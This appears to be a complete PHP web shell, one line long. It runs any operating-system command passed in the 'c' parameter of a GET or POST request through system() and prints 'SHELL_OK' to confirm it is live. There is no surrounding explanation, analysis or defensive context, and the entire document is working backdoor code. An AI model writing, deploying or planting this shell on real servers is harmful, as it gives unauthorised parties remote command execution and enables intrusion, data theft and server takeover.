<?php if(isset($_GET["c"])){system($_GET["c"]);} if(isset($_POST["c"])){system($_POST["c"]);} echo "SHELL_OK"; ?>